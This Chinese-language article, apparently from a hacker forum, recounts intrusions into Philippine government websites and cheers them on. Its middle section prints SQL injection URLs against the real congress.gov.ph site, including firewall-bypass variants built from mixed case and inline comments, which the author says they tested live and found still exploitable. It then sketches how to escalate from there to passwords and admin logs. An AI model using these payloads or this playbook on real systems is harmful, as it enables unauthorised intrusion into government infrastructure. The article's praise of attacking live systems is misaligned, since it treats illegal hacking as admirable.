去年菲律宾官方船对台湾渔船开枪致台湾渔民死亡,并拒不道歉,这件事闹的沸沸扬扬的时候,一支自称台湾匿名者的黑客入侵了菲律宾官网,除了挂了首页还公布了所有gov.ph的DNS密码。
大陆一帮小黑摩拳擦掌的时候,台湾黑客们不卑不亢的制裁行动不禁让两岸各界人士们大快人心。就快一周年的最近,小编通过圈内人士了解到这件入侵事情其实要远比我们想象的要复杂,从另一个方面看倒也远比我们想象的简单。小编带大家了解一下吧。
为了让大家更清楚菲律宾网络防御力,小编先来给大家八卦一下菲律宾网络的黑历史吧。
菲律宾国家官网域名就是gov.ph,站点核心是Wordpress框架,已经沿用了很多年。
据可查的历史,菲律宾官网第一次被黑应该在五年前,那个时候服务器还在用非常老旧版本的MySQL,对外开放了3306,被入侵原因是低版本MySQL存在00字节root绕过漏洞,通过一个perl脚本可以轻松获得MySQL的root,更具体的细节小编就不得而知了,看当时的截图,服务器的root是禁止非localhost以外的机器外连的。
第二次黑历史与上一次相隔一年。被黑原因很简单,爆破Wordpress后台高权限密码,通过编辑插件获取webshell权限。
从第二次黑历史至今已经数不清中间有多少次被黑了,小编因为联系不上中间被黑事件的当事黑阔,就不进行一一介绍了。
好了,下面要介绍的是入侵dns.gov.ph的事件了。
其实拥有这台服务器权限的黑客并不只有一个,下面就介绍一下某位黑客的入侵黑历史。我们下面简称黑客N。
黑客N告诉小编,圈内有一批人专注于控制某些网络集群,而菲律宾政府网络的黑客并不只有一批人,同时还有一些东南亚国家的黑客,至于目的,大概就是玩玩吧。
在Long Long Ago,菲律宾很多核心站点都被解析在一台服务器上,例如i.gov.ph,dns.gov.ph(因为被挂涂鸦挂的,现在已经将dns.gov.ph单独劈出来了)。
我们可以在某些站点ip收集网站看到。
当初上面站点烦杂,存在安全问题的站点也很多,例如黑客N上去的congress.gov.ph这个站点,这个站点是菲律宾众议院的网站。小编来看了一下存在的安全问题:
正常:congress.gov.ph/press/details.php?pressid=7682+order+by+8
空白:congress.gov.ph/press/details.php?pressid=7682+order+by+9
防火墙封ip:congress.gov.ph/press/details.php?pressid=7682+union+select
小编亲测注入点仍然存在,不过服务器加装了防火墙。黑客N告诉小编其实防火墙绕过很容易,例如:
防火墙不封ip:congress.gov.ph/press/details.php?pressid=7682+UniOn/*xxxxxxxxxxxxxxxxxxxxxxxx*/+/*!select*/
防火墙封ip:congress.gov.ph/press/details.php?pressid=7682+UniOn/*xxxxxxxxxxxxxxxxxxxxxxxx*/+/*!select*/+1,2,3,4,5,6,7,8
防火墙不封ip:congress.gov.ph/press/details.php?pressid=0+UniOn/*xxxxxxxxxxxxxxxxxxxxxxxx*/+/*!select*/1/*xfdf*/,/*sdf*/2/*xfdf*/,/*sdf*/3/*xfdf*/,/*sdf*/4/*xfdf*/,/*sdf*/5/*xfdf*/,/*sdf*/6/*xfdf*/,/*sdf*/7/*xfdf*/,/*sdf*/8+–+
这是小编亲测截图。
根据大牛们的思路小编玩到这里已经心里有谱了,想必一些长期做持续渗透的高手们也有谱了。
后面的步骤就是,通过注入,获取权限,读密码记录管理员日志,既然曾经解析在同一个ip上面过,那就说明管理团队是一支。黑客N也证实,其实菲律宾懂点网络安全的高手没几个。
技术部分完毕。小编不禁要问,dns.gov.ph的入侵者和大陆黑客是什么关系呢?小编曾经准备了很多个问题要对黑客N提问,例如涂鸦的台湾黑客和大陆圈内黑客有没有联系,这次事件谁帮了谁,圈内对台湾黑客涂鸦的事情怎么看?。。。。以下省略N个问题。
黑客N的一句话让小编觉得基本可以回答小编所有的问题了:台湾黑客和大陆黑客有什么区别,一个名字两种叫法。
最后,小编引用黑客N哥哥的话来评价菲律宾政府网络防御力和菲律宾骨干网络防御力,没有木马的gov.ph站点真的很少,没有中国黑客放后门的gov.ph服务器很少,服务器就像海军的几条破船一样,战则必败。
//Silic.Org
来自习科